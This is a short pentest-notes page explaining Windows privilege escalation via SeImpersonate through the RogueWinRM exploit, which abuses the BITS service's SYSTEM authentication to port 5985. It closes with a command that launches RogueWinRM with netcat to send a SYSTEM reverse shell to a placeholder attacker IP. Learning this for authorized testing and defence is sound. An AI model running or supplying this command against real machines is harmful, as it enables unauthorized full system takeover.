Skip to main content

SeImpersonate - SeAssignPrimaryToken

Required Privileges: Administrators - SeAssignPrimaryTokenPrivilege - SeImpersonatePrivilege
Note

Only Possible if WinRM Service Is Not Running. Default on Windows 10 but Not on Windows Server 2019.


The Privileges SeAssignPrimaryToken - SeImpersonate allow a Process to Impersonate other Users and act on their behalf. Impersonation usually consists of being able to Spawn a Process or Thread under the Security context of another User.

In Windows Systems, LOCAL SERVICE and NETWORK SERVICE ACCOUNTS already have such Privileges. Internet Information Services (IIS) will also create a similar Default Account for Web Applications.

To Elevate Privileges using such Accounts we need to Spawn a Process so that Users can connect and Authenticate to it for Impersonation to Occur. After that find a way to force Privileged Users to Connect and Authenticate to the spawned Malicious Process. We can use RogueWinRM Exploit to Accomplish both of these Conditions.


RogueWinRM

RogueWinRM Exploit is possible because whenever a User (Including Unprivileged Users) starts the BITS Service (Background Intelligent Transfer Service) in Windows, it Automatically creates a Connection to [PORT 5985] using SYSTEM Privileges.

[PORT 5985] Typically used for the WinRM Service (Windows Remote Management), which is simply a Port that exposes a Powershell console to be used Remotely through the Network (Similar to SSH).

If WinRM Service isn't Running on the Target Machine, an Attacker can start a Fake WinRM Service on [Port 5985] and catch the Authentication attempt made by the BITS Service when starting. If the attacker has SeImpersonate Privileges, he can execute any Command on behalf of the Connecting User, which is SYSTEM.



The Exploit may take up to 2 Minutes to Work

This happens if we run the Exploit Multiple Times as it must wait for the BITS Service to Stop before Starting it again. The BITS Service will Stop Automatically after 2 Minutes.


To make this Work we need to copy the RogueWinRM with Netcat to the Target Machine after that we need to start a Listener on our Machine.

RogueWinRM.exe -p "Netcat Location" -a "-e cmd.exe <Attacker IP> <PORT>"